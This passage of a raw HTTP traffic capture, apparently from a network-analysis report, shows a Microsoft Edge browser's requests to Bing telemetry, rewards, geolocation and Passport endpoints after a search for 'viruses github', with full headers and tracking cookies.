bm_sv=0DEC9B29819DC3ABBF8D0CF2C33AC1E4~YAAQvXd7XCEc4kqSAQAAFhluXRkP3pHPMOMJR8xpE6m40xBEGZQq9h4J17KsvtYhfIc9MmSdHop+L8bNS+ikk5gbznoaPhCHGPEZ1UD4XiyZ4hiflICrg8RdI+KbBt2Ez4Eg4mzoB9LO8ADVCgLg1G4+xyOqIe08zfgSjNHhzLE30HtXgDvuzGdF39DTkqNMffb/ktSk3iWjaL1R5ar1Hck7Xg/Lvc8poGQ0dpWICy7igeDOJD4oxSEyTdZ/AA==~1; SRCHHPGUSR=SRCHLANG=en&HV=1728144350&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2043&DPR=1.0&UTC=0&PV=10.0

Response

HTTP/1.1 200 OK

Content-Length: 0
Access-Control-Allow-Origin: *
Date: Sat, 05 Oct 2024 16:05:51 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.bf777b5c.1728144351.8b9afff
POST

https://www.bing.com/rewardsapp/reportActivity?IG=1D2FDF991A984BF98138E4B738C9DC15&IID=SERP.5060&q=viruses+github&qs=LT&pq=viruses+gi&sc=10-10&cvid=0DD30F05AB304142B388EAD39E0E9879&FORM=QBRE&sp=1&ghc=1&lq=0

msedge.exe

Remote address:

92.123.128.189:443

Request

POST /rewardsapp/reportActivity?IG=1D2FDF991A984BF98138E4B738C9DC15&IID=SERP.5060&q=viruses+github&qs=LT&pq=viruses+gi&sc=10-10&cvid=0DD30F05AB304142B388EAD39E0E9879&FORM=QBRE&sp=1&ghc=1&lq=0 HTTP/1.1
Host: www.bing.com
Connection: keep-alive
Content-Length: 185
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
Content-type: application/x-www-form-urlencoded
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: */*
Origin: https://www.bing.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/search?q=viruses+github&qs=LT&pq=viruses+gi&sc=10-10&cvid=0DD30F05AB304142B388EAD39E0E9879&FORM=QBRE&sp=1&ghc=1&lq=0
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: _C_Auth=; MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; USRLOC=HS=1&BLOCK=TS=241005160532; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4; bm_sv=0DEC9B29819DC3ABBF8D0CF2C33AC1E4~YAAQvXd7XCEc4kqSAQAAFhluXRkP3pHPMOMJR8xpE6m40xBEGZQq9h4J17KsvtYhfIc9MmSdHop+L8bNS+ikk5gbznoaPhCHGPEZ1UD4XiyZ4hiflICrg8RdI+KbBt2Ez4Eg4mzoB9LO8ADVCgLg1G4+xyOqIe08zfgSjNHhzLE30HtXgDvuzGdF39DTkqNMffb/ktSk3iWjaL1R5ar1Hck7Xg/Lvc8poGQ0dpWICy7igeDOJD4oxSEyTdZ/AA==~1; SRCHHPGUSR=SRCHLANG=en&HV=1728144350&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2043&DPR=1.0&UTC=0&PV=10.0

Response

HTTP/1.1 200 OK

Content-Length: 1034
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Content-Encoding: gzip
Expires: -1
Pragma: no-cache
Vary: Accept-Encoding
X-EventID: 670163df9e0f4d51a7d9efd62d988bf5
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
UserAgentReductionOptOut: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
Content-Security-Policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-m5Nvo/jojsS1IvpaQ+tu60pgvBTuPbFToForwnnceH8='; base-uri 'self';report-to csp-endpoint
Report-To: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
X-Ceto-ref: 670163df9e0f4d51a7d9efd62d988bf5|AFD:670163df9e0f4d51a7d9efd62d988bf5|2024-10-05T16:05:51.290Z
Date: Sat, 05 Oct 2024 16:05:51 GMT
Connection: keep-alive
Set-Cookie: _C_ETH=1; expires=Fri, 04 Oct 2024 16:05:51 GMT; domain=.bing.com; path=/; secure; httponly
Set-Cookie: _C_Auth=
Set-Cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:51.3048865+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; domain=.bing.com; expires=Sun, 05-Oct-2025 16:05:51 GMT; path=/; secure; SameSite=None
Set-Cookie: _Rwho=u=d&ts=2024-10-05; domain=.bing.com; path=/; secure; HttpOnly; SameSite=None
Set-Cookie: _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=6&RB=0&GB=0&RG=200&RP=3; domain=.bing.com; path=/; secure; SameSite=None
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.bf777b5c.1728144351.8b9b138
GET

https://www.bing.com/geolocation/write?isBlocked=true&sid=1FD780794ED66EF4059195764FF56FEA&clientsid=undefined

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /geolocation/write?isBlocked=true&sid=1FD780794ED66EF4059195764FF56FEA&clientsid=undefined HTTP/1.1
Host: www.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: */*
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/search?q=viruses+github&qs=LT&pq=viruses+gi&sc=10-10&cvid=0DD30F05AB304142B388EAD39E0E9879&FORM=QBRE&sp=1&ghc=1&lq=0
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; USRLOC=HS=1&BLOCK=TS=241005160532; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4; bm_sv=0DEC9B29819DC3ABBF8D0CF2C33AC1E4~YAAQvXd7XCEc4kqSAQAAFhluXRkP3pHPMOMJR8xpE6m40xBEGZQq9h4J17KsvtYhfIc9MmSdHop+L8bNS+ikk5gbznoaPhCHGPEZ1UD4XiyZ4hiflICrg8RdI+KbBt2Ez4Eg4mzoB9LO8ADVCgLg1G4+xyOqIe08zfgSjNHhzLE30HtXgDvuzGdF39DTkqNMffb/ktSk3iWjaL1R5ar1Hck7Xg/Lvc8poGQ0dpWICy7igeDOJD4oxSEyTdZ/AA==~1; SRCHHPGUSR=SRCHLANG=en&HV=1728144350&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2043&DPR=1.0&UTC=0&PV=10.0&EXLTT=1

Response

HTTP/1.1 200 OK

Cache-Control: private
Content-Length: 25
Content-Type: text/html
Content-Encoding: gzip
Vary: Accept-Encoding
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
X-EventID: 670163dfb0904ab9b51cd33b6bebba2a
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
UserAgentReductionOptOut: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
Content-Security-Policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-jfSBno/xeFV16lrFzyRuUVTAFJcZn4y/bwJBW2GNMyY='; base-uri 'self';report-to csp-endpoint
Report-To: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
X-MSEdge-Ref: Ref A: 908698FC75CD4412A0CBA0B5B99B570F Ref B: LON601060102031 Ref C: 2024-10-05T16:05:51Z
Date: Sat, 05 Oct 2024 16:05:51 GMT
Connection: keep-alive
Set-Cookie: MUIDB=05879ADD3EF86D540F588FD23FDB6C78; expires=Thu, 30-Oct-2025 16:05:51 GMT; path=/; HttpOnly
Set-Cookie: USRLOC=HS=1&BLOCK=TS=241005160551; domain=.bing.com; expires=Thu, 30-Oct-2025 16:05:51 GMT; path=/; secure; HttpOnly; SameSite=None
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.bf777b5c.1728144351.8b9b207
GET

https://www.bing.com/fd/ls/l?IG=1D2FDF991A984BF98138E4B738C9DC15&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1728144350727%2C%22Name%22%3A%22block%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /fd/ls/l?IG=1D2FDF991A984BF98138E4B738C9DC15&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1728144350727%2C%22Name%22%3A%22block%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D HTTP/1.1
Host: www.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://www.bing.com/search?q=viruses+github&qs=LT&pq=viruses+gi&sc=10-10&cvid=0DD30F05AB304142B388EAD39E0E9879&FORM=QBRE&sp=1&ghc=1&lq=0
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHUSR=DOB=20241005&T=1728144325000; _Rwho=u=d&ts=2024-10-05; USRLOC=HS=1&BLOCK=TS=241005160532; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4; bm_sv=0DEC9B29819DC3ABBF8D0CF2C33AC1E4~YAAQvXd7XCEc4kqSAQAAFhluXRkP3pHPMOMJR8xpE6m40xBEGZQq9h4J17KsvtYhfIc9MmSdHop+L8bNS+ikk5gbznoaPhCHGPEZ1UD4XiyZ4hiflICrg8RdI+KbBt2Ez4Eg4mzoB9LO8ADVCgLg1G4+xyOqIe08zfgSjNHhzLE30HtXgDvuzGdF39DTkqNMffb/ktSk3iWjaL1R5ar1Hck7Xg/Lvc8poGQ0dpWICy7igeDOJD4oxSEyTdZ/AA==~1; SRCHHPGUSR=SRCHLANG=en&HV=1728144350&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2043&DPR=1.0&UTC=0&PV=10.0; _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:51.3048865+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=6&RB=0&GB=0&RG=200&RP=3

Response

HTTP/1.1 200 OK

Content-Length: 0
Access-Control-Allow-Origin: *
Date: Sat, 05 Oct 2024 16:05:51 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.bf777b5c.1728144351.8b9b2fe
GET

https://www.bing.com/secure/Passport.aspx?popup=1&ssl=1

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /secure/Passport.aspx?popup=1&ssl=1 HTTP/1.1
Host: www.bing.com
Connection: keep-alive
Upgrade-Insecure-Requests: 1
DNT: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: navigate
Sec-Fetch-Dest: iframe
ect: 4g
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-arch: "x86"
sec-ch-ua-platform: "Windows"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model: ""
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHUSR=DOB=20241005&T=1728144325000; _Rwho=u=d&ts=2024-10-05; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4; bm_sv=0DEC9B29819DC3ABBF8D0CF2C33AC1E4~YAAQvXd7XCEc4kqSAQAAFhluXRkP3pHPMOMJR8xpE6m40xBEGZQq9h4J17KsvtYhfIc9MmSdHop+L8bNS+ikk5gbznoaPhCHGPEZ1UD4XiyZ4hiflICrg8RdI+KbBt2Ez4Eg4mzoB9LO8ADVCgLg1G4+xyOqIe08zfgSjNHhzLE30HtXgDvuzGdF39DTkqNMffb/ktSk3iWjaL1R5ar1Hck7Xg/Lvc8poGQ0dpWICy7igeDOJD4oxSEyTdZ/AA==~1; _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:51.3048865+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=6&RB=0&GB=0&RG=200&RP=3; SRCHHPGUSR=SRCHLANG=en&HV=1728144350&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2043&DPR=1.0&UTC=0&PV=10.0&WTS=63863741149; USRLOC=HS=1&BLOCK=TS=241005160551

Response

HTTP/1.1 200 OK

Cache-Control: no-cache,no-store
Pragma: no-cache
Content-Length: 287
Content-Type: text/html; charset=utf-8
Content-Encoding: gzip
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Vary: Accept-Encoding
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
X-EventID: 670163df796147a58bcca0431e4982b5
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
UserAgentReductionOptOut: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
Content-Security-Policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-9GjPyqmwUksE/QD9RFydJ47OLFnJVQU7bmR1tNKy7eM='; base-uri 'self';report-to csp-endpoint
Report-To: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
X-MSEdge-Ref: Ref A: 50FEBE5DFDEB4DF3AFBD01D39CBC0BA9 Ref B: LON601060102031 Ref C: 2024-10-05T16:05:51Z
Date: Sat, 05 Oct 2024 16:05:51 GMT
Connection: keep-alive
Set-Cookie: .MSA.Auth=; expires=Thu, 01 Jan 1970 00:00:00 GMT; max-age=0; domain=.bing.com; path=/; secure; samesite=lax; httponly
Set-Cookie: MUIDB=05879ADD3EF86D540F588FD23FDB6C78; expires=Thu, 30-Oct-2025 16:05:51 GMT; path=/; HttpOnly
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.bf777b5c.1728144351.8b9b39d
POST

https://www.bing.com/fd/ls/lsp.aspx

msedge.exe

Remote address:

92.123.128.189:443

Request

POST /fd/ls/lsp.aspx HTTP/1.1
Host: www.bing.com
Connection: keep-alive
Content-Length: 20296
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
Content-Type: text/xml
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: */*
Origin: https://www.bing.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/search?q=viruses+github&qs=LT&pq=viruses+gi&sc=10-10&cvid=0DD30F05AB304142B388EAD39E0E9879&FORM=QBRE&sp=1&ghc=1&lq=0
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHUSR=DOB=20241005&T=1728144325000; _Rwho=u=d&ts=2024-10-05; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4; bm_sv=0DEC9B29819DC3ABBF8D0CF2C33AC1E4~YAAQvXd7XCEc4kqSAQAAFhluXRkP3pHPMOMJR8xpE6m40xBEGZQq9h4J17KsvtYhfIc9MmSdHop+L8bNS+ikk5gbznoaPhCHGPEZ1UD4XiyZ4hiflICrg8RdI+KbBt2Ez4Eg4mzoB9LO8ADVCgLg1G4+xyOqIe08zfgSjNHhzLE30HtXgDvuzGdF39DTkqNMffb/ktSk3iWjaL1R5ar1Hck7Xg/Lvc8poGQ0dpWICy7igeDOJD4oxSEyTdZ/AA==~1; _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:51.3048865+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=6&RB=0&GB=0&RG=200&RP=3; USRLOC=HS=1&BLOCK=TS=241005160551; 